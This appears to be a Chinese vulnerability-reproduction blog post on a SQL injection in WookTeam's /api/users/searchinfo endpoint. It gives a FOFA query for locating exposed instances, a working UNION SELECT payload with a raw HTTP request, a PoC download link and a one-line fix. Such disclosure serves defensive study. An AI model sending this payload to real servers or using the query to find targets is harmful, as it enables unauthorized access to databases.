首页 > 数据库 >wookteam协作平台api/users/searchinfo接口存在SQL注入漏洞 附POC

wookteam协作平台api/users/searchinfo接口存在SQL注入漏洞 附POC

时间:2024-08-15 19:24:52浏览次数:9  
标签:2CNULL% 协作 users searchinfo 29% 漏洞 xx wookteam POC

@[toc]

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. wookteam协作平台简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

wookteam协作平台

2.漏洞描述

wookteam项目基于PHP语言开发,项目搭建需要PHP相关环境,涉及中间件技术以及Nginx和MySQL。该项目很容易在Docker环境中部署。下载源码后,使用./cmdinstall命令一键构建项目。Wookteam是一个支持在线协作管理和沟通的开源平台。它提供在线流程图、思维导图构建以及项目管理的可视化展示和分析,让项目团队成员直观地看到项目的进展情况和相关问题。数据信息。项目中还有一个在线知识库,可以存储开发中的迭代文档。此外,还有即时聊天工具,方便项目团队成员之间的沟通。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

wookteam协作平台

4.fofa查询语句

title="Wookteam"

5.漏洞复现

漏洞链接:http://xx.xx.xx.xx/api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cmd5%281%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23

漏洞数据包,执行md(1)函数:

GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cmd5%281%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host: xx.xx.xx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

执行user()函数 图11 可以跑sqlmap

6.POC&EXP

POC工具下载地址:夸克网盘分享

7.整改意见

过滤参数

8.往期回顾

标签:2CNULL%,协作,users,searchinfo,29%,漏洞,xx,wookteam,POC
From: https://blog.csdn.net/nnn2188185/article/details/141228202

相关文章

  • 泛微 e-office 10 schema_mysql.sql文件存在敏感信息泄露 附POC
    @[toc]免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。1.泛微e-office10简介微信公众号搜索:南风漏洞复现文......
  • 使用diffusers来训练自己的Stable Diffusion 3大模型
    基于diffusers的Stablediffusion训练代码这里给大家介绍一个基于diffusers库来训练stablediffusion相关模型的训练代码,包含Lora、ControlNet、IP-adapter、Animatediff,以及最新的stablediffusion3lora版本的训练代码。现有的一些类似kohya-ss训练器虽然用起来方便,但......
  • WookTeam searchinfo SQL注入漏洞复现
    0x01产品简介WookTeam是一款轻量级的在线团队协作工具,提供各类文档工具、在线思维导图、在线流程图、项目管理、任务分发,知识库管理等工具。0x02漏洞概述WookTeam/api/users/searchinfo 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用SQL注入漏洞获取数据库中的信......
  • Windows超高危漏洞“狂躁许可”实际利用全过程曝光!(附POC)
     自"永恒之蓝"之后,Windows再次暴露出一个影响全版本且高度稳定可利用的预认证远程代码执行(RCE)漏洞。本文将跟随漏洞披露者的第一视角,详细探讨漏洞的技术原理、利用方法,并提供相关的概念验证伪代码。文章同时附有演示视频,展示了该漏洞在最新的WindowsServer2025上的实......
  • 易捷OA协同办公系统 ShowPic接口任意文件读取漏洞复现 [附POC]
    文章目录易捷OA协同办公系统ShowPic接口任意文件读取漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现易捷OA协同办公系统ShowPic接口任意文件读取漏洞复现[附POC]0x01前言免责......
  • 万户OA ezOFFICE graph_include.jsp接口SQL注入漏洞复现 [附POC]
    文章目录万户OAezOFFICEgraph_include.jsp接口SQL注入漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现0x06修复建议万户OAezOFFICEgraph_include.jsp接口SQL注入漏洞复现[附P......
  • 泛微E-office 10 schema_mysql接口敏感信息泄露漏洞复现 [附POC]
    文章目录泛微E-office10schema_mysql接口敏感信息泄露漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现泛微E-office10schema_mysql接口敏感信息泄露漏洞复现[附POC]0x01前言......
  • Diffusers中Pipeline的数据类型是怎么设置和转化的,pipeline.dtype和pipeline.from_pre
    参考资料:Diffusers中DiffusionPipeline基类的[源码]众所周知Pipeline是Diffusers中最重要的一个API接口,一直以来我都对这个接口数据结构的获取一知半解,今天看了下源码终于知道了这个API结构的数据类型是如何设置的。直接看代码:@propertydefdtype(self)->torch......
  • 强化学习性能测试方法:取最后10个epoch的testing epoch的均值 —— 强化学习中的一种性
    参考:https://www.cnblogs.com/devilmaycry812839668/p/17813337.htmlTheActor-MimicandexpertDQNtrainingcurvesfor100trainingepochsforeachofthe8games.Atrainingepochis250,000framesandforeachtrainingepochweevaluatethenetworkswith......
  • 大疆 DJI Pocket 2 灵眸口袋云台相机 评测
    大疆Pocket2外观精致优雅,给人一种高颜值的视觉感受。由于其小巧便携,可以轻松装入口袋,方便随时随地记录美好时刻。在画质方面,Pocket2同样支持4K超高清视频拍摄,让你的作品更加细腻生动。此外,它还具备智能美颜功能,能够自动优化肤色与肤质,让你的每一张照片、每一段视频都更加美丽......